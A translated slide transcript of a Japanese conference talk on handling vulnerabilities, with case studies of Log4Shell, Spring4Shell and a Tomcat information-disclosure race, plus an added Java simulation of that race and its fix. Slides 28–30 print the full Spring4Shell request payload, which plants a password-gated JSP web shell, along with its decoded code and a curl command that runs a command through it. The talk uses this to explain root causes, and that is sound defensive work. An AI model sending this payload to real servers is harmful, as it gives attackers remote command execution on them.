
How To 脆弱性対応 (How To: Vulnerability Response)

cm-komuro
November 21, 2022


Slides presented at DevelopersIO Sapporo 2022.


Transcript

  1. How To 脆弱性対応 (How To: Vulnerability Response)
    DevelopersIO Sapporo 2022

  2. What this talk covers
    This is my personal experience.


  3. Introduction
    • It is safe to say there is no such thing as a system without vulnerabilities.
    • The stages are detection, impact-scope investigation, workaround, permanent fix.
    • Everything after detection is a human judgement call.
    • If the component is OSS, reading the code usually tells you most of what you need.
    • Security is everyone's job.

  4. About me
    Name: 小室 啓 (KOMURO HIRAKU)
    Team: prismatix division, Fannaly team
    Role: Project manager
    Interests: Java, Spring, vulnerability research


  5. Why are vulnerabilities a problem?

  6. Leaving a vulnerability unaddressed is a problem
    • Malware infection or backdoors
    • Theft of confidential information such as user data
    • Being used as a stepping stone for attacks on other targets
    • Being marked as an exploitable target
    • etc.


  7. Vulnerability


  8. Vulnerabilities appear at many layers
    • Infrastructure
    • OS
    • Middleware (runtime environment)
    • Application code
    • ... and many more
    The examples in this talk come from the middleware and application-code layers.

  9. Ways to check range from manual to automated
    • CVE
      https://www.cve.org/Downloads
    • JVN
      https://jvn.jp/
    • For Spring-related components, VMware's vulnerability list
      https://tanzu.vmware.com/security
    • Security services such as Snyk
    • Twitter


  10. Things I have investigated

  11. I read the commits that fix vulnerabilities and think about them
    • Log4j脆弱性問題におけるSpring Bootアプリケーションの検… (checking Spring Boot applications for the Log4j vulnerability)
      https://dev.classmethod.jp/articles/log4j-rce-spring-boot-research/
    • CVE-2022-22965 Spring4Shell impact investigation
      https://dev.classmethod.jp/articles/spring-boot-spring4shell/
    • Understanding CVE-2021-43980 by reading the Tomcat fix commit
      https://dev.classmethod.jp/articles/read-tomca-code-for-cve…

  12. Listed as a reference by others
    • piyolog
      https://piyolog.hatenadiary.jp/entry/…
    • JVN
      https://jvn.jp/vu/JVNVU…/index.html


  13. How we work

  14. Response team
    • An ad-hoc team of roughly … people is formed on the spot
    • Coordinator: … person
    • Reproduction and impact investigation: … to … people
    • Workaround and root-cause analysis: … to … people

  15. How the team operates
    As the first step, confirm how large the impact scope is and whether we have the dependency at all.
    If there appears to be an impact and investigation is needed, stand up the team.
    Split roles within the team.
    Work in parallel.
    Share information fairly frequently.

  16. Reproduction team
    • Reproduce the attack from the PoC code
    • Check two configurations, broadly: the existing one, and one modified to satisfy the vulnerability's preconditions
    • Apply the mitigation and check whether it actually blocks the attack


  17. Root-cause investigation team

  18. Confirming the root cause
    • Work it out from the fix commit
    • Read the blog posts published by security vendors and individual researchers who analysed it (almost all in English)
    • Run the reproduced configuration under a debugger
    • Raise the log level and read through the output

  19. Concrete examples (if time permits)


  20. Concrete example: Log4Shell

  21. Log4Shell
    • CVE-2021-44228
    • A nasty vulnerability that caused an uproar at the end of 2021
    • Anyone can exploit it against a vulnerable target
    • Log4j 2
      A well-known logger implementation
      The other major implementation is Logback

  22. Behaviour we verified

  23. Log4Shell
    • The PoC was circulating before the CVE ID was even assigned
    • Exploitable with little specialist knowledge
    • Dynamically injects arbitrary classes into the process


  24. Concrete example: Spring4Shell

  25. Spring4Shell
    Abuses Spring's "read the situation and go find it" mechanism (the data binding that resolves nested property paths)
    The preconditions for exploitation are harder to meet than Log4Shell's
    Java 9 or later
    Deployed as a war

  26. Java 9 or later is affected
    • module exists only from Java 9 onward
    • Java 8 and earlier have no module, so the PoC's attack method does not succeed
    https://www.oracle.com/corporate/features/understanding-java-9-modules.html

  27. Difference by deployment type
    • Applications deployed as a war are affected
    • Artifacts that run standalone, such as bootJar and bootWar, are out of scope
    (Spring's advisory stresses that these are the preconditions of the published exploit, not of the underlying flaw, so upgrading is still required for deployments that do not match them.)

  28. Spring tries to interpret the following request
    • Send a POST request with the following in the body
    • Data binding walks the property path looking for a class it can bind each property to
    class.module.classLoader.resources.context.parent.pipeline.first.pattern=%25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    &class.module.classLoader.resources.context.parent.pipeline.first.suffix=.jsp
    &class.module.classLoader.resources.context.parent.pipeline.first.directory=webapps/ROOT
    &class.module.classLoader.resources.context.parent.pipeline.first.prefix=tomcatwar
    &class.module.classLoader.resources.context.parent.pipeline.first.fileDateFormat=

  29. What the request is trying to do
    • Walk from the ClassLoader to the AccessLogValve (the slide calls it AccessValve)
    • Rewrite Tomcat's access-log settings
    • Embed code that reads internal information into the log pattern, as plain text (Tomcat's %{name}i pattern directive expands to the value of request header name, which is how the PoC supplies the JSP delimiters and the Runtime class name through the c1, c2 and suffix headers)
    • Change the log file's extension to .jsp
    • Point the log output at Tomcat's publicly served directory

  30. What happens when it runs
    • After the request, the access log file becomes a JSP
    • It is served publicly
    Encoded pattern:
    %25%7Bc2%7Di%20if(%22j%22.equals(request.getParameter(%22pwd%22)))%7B%20java.io.InputStream%20in%20%3D%20%25%7Bc1%7Di.getRuntime().exec(request.getParameter(%22cmd%22)).getInputStream()%3B%20int%20a%20%3D%20-1%3B%20byte%5B%5D%20b%20%3D%20new%20byte%5B2048%5D%3B%20while((a%3Din.read(b))!%3D-1)%7B%20out.println(new%20String(b))%3B%20%7D%20%7D%20%25%7Bsuffix%7Di
    URL-decoded:
    %{c2}i if("j".equals(request.getParameter("pwd"))){ java.io.InputStream in = %{c1}i.getRuntime().exec(request.getParameter("cmd")).getInputStream(); int a = -1; byte[] b = new byte[2048]; while((a=in.read(b))!=-1){ out.println(new String(b)); } } %{suffix}i
    curl -X GET 'http://localhost:8080/tomcatwar.jsp?pwd=j&cmd=whoami'
    The output of whoami comes back in the response.

  31. Deployment type
    ClassLoader against which the attack works: WebappClassLoader
    ClassLoader against which the attack fails: LaunchedURLClassLoader
    So, what is the difference?

  32. The difference is getResources(), maybe
    In WebappClassLoader, a no-argument getResources() is defined.
    https://tomcat.apache.org/tomcat-…-doc/api/org/apache/catalina/loader/WebappClassLoaderBase.html#getResources()

  33. The difference is getResources(), maybe
    LaunchedURLClassLoader has no no-argument getResources().
    https://docs.oracle.com/javase/jp/…/docs/api/java.base/java/lang/ClassLoader.html#getResource(java.lang.String)

  34. Reaching the ClassLoader through binding
    class.module.classLoader
      getClass() → getModule() → getClassLoader()
    class.module.classLoader.resources.context.parent.pipeline.first.pattern=… (the body shown on slide 28)
    If this ClassLoader is a WebappClassLoader, a no-argument getResources() exists, and the rest of the path can be resolved.

  35. Classes traversed
    WebappClassLoader.getResources()
    → WebResourceRoot.getContext()
    → Context.getParent()
    → Container.getPipeline()
    → Pipeline.getFirst()
    → Valve (AccessLogValve)

  36. How it was fixed
    https://github.com/spring-projects/spring-framework/pull/…/files
    Property access to the ClassLoader is now ignored.
    (The fix shipped in Spring Framework 5.3.18 and 5.2.20, picked up by Spring Boot 2.6.6 and 2.5.12.)


  37. Concrete example: information disclosure in Tomcat

  38. Responses get mixed up
    • JVNVU#…: Information disclosure vulnerability in Apache Tomcat due to a race condition in HttpProcessor instances
      https://jvn.jp/vu/JVNVU…/index.html

  39. Hard to reproduce
    • Difficult to trigger at will from outside
    • It can still happen by chance
    • Affected versions:
      Apache Tomcat 10.1.0-M1 to 10.1.0-M12
      Apache Tomcat 10.0.0-M1 to 10.0.18
      Apache Tomcat 9.0.0-M1 to 9.0.60
      Apache Tomcat 8.5.0 to 8.5.75

  40. Reading the fix commit
    https://github.com/apache/tomcat/commit/…
    • The Object field was changed to AtomicReference<Object>
    • takeCurrentProcessor() was added

  41. Rough understanding (my personal take)
    • An Object referenced from multiple request-handling threads
    • This Object writes the response to the socket
    • The code fetches it (get) and only stores null into the field some time later
    • If another thread happens to access the Object before null is stored, it gets the same reference
    • Several responses end up written through the same Object
    https://dev.classmethod.jp/articles/read-tomca-code-for-cve…
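To make the race on the slide concrete, here is an added simulation (my own code, not Tomcat's): a holder that hands out a shared processor the vulnerable way, a plain read followed some time later by storing null, next to a holder that does both in one step with AtomicReference.getAndSet(null), which is the shape the fix commit's takeCurrentProcessor() introduced. Several threads race to take the same processor for many rounds; a round in which more than one thread received the object is the "mixed response" condition. The Processor type, the two holders and the round count are invented for the demo. The counts are timing-dependent, and the plain holder can show zero duplicates on a lightly loaded machine, which is exactly the "hard to reproduce, but possible by chance" point the deck makes.

```java
import java.util.concurrent.CountDownLatch;
import java.util.concurrent.ExecutorService;
import java.util.concurrent.Executors;
import java.util.concurrent.TimeUnit;
import java.util.concurrent.atomic.AtomicInteger;
import java.util.concurrent.atomic.AtomicReference;

// Added example: simulates the get-then-clear race the deck describes.
public class ProcessorHandoffRace {

    // Stand-in for the object that writes a response to the socket.
    static final class Processor { }

    interface Holder {
        void set(Processor p);
        Processor take();   // must hand the processor to exactly one caller
    }

    // Vulnerable shape: read the reference now, clear it later as a separate step.
    static final class PlainHolder implements Holder {
        private volatile Processor current;
        public void set(Processor p) { current = p; }
        public Processor take() {
            Processor p = current;   // a second thread can read the same reference here
            Thread.yield();          // widen the window so the demo shows the race
            current = null;
            return p;
        }
    }

    // Fixed shape: AtomicReference and a single getAndSet(null), like takeCurrentProcessor().
    static final class AtomicHolder implements Holder {
        private final AtomicReference<Processor> current = new AtomicReference<>();
        public void set(Processor p) { current.set(p); }
        public Processor take() { return current.getAndSet(null); }
    }

    // Runs `rounds` rounds in which `threads` threads all try to take one processor;
    // returns how many rounds handed the same processor to more than one thread.
    static int countDuplicateHandoffs(Holder holder, int rounds, int threads) throws InterruptedException {
        ExecutorService pool = Executors.newFixedThreadPool(threads);
        int duplicates = 0;
        try {
            for (int r = 0; r < rounds; r++) {
                holder.set(new Processor());
                CountDownLatch start = new CountDownLatch(1);
                CountDownLatch done = new CountDownLatch(threads);
                AtomicInteger winners = new AtomicInteger();
                for (int t = 0; t < threads; t++) {
                    pool.execute(() -> {
                        try {
                            start.await();                 // release all threads together
                            if (holder.take() != null) {
                                winners.incrementAndGet();
                            }
                        } catch (InterruptedException e) {
                            Thread.currentThread().interrupt();
                        } finally {
                            done.countDown();
                        }
                    });
                }
                start.countDown();
                done.await();
                if (winners.get() > 1) {
                    duplicates++;                          // two writers for one socket
                }
            }
        } finally {
            pool.shutdown();
            pool.awaitTermination(10, TimeUnit.SECONDS);
        }
        return duplicates;
    }

    public static void main(String[] args) throws InterruptedException {
        int rounds = 20_000, threads = 4;
        System.out.println("plain holder, rounds with a shared processor:  "
                + countDuplicateHandoffs(new PlainHolder(), rounds, threads));
        System.out.println("atomic holder, rounds with a shared processor: "
                + countDuplicateHandoffs(new AtomicHolder(), rounds, threads));
    }
}
```

The atomic holder never reports a duplicate, because getAndSet(null) makes the read and the clear one indivisible operation: whichever thread wins gets the processor and every later caller sees null. That is the property to look for when reading the real fix commit; the AtomicReference type change on its own is not enough if callers still do a separate get() followed by set(null).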

  42. Summary
    • Vulnerabilities are close to home, and responding cannot wait
    • Very little can be built without using code written by someone else
    • Developers should be more conscious of the OSS they depend on
    • Security is something we all think about together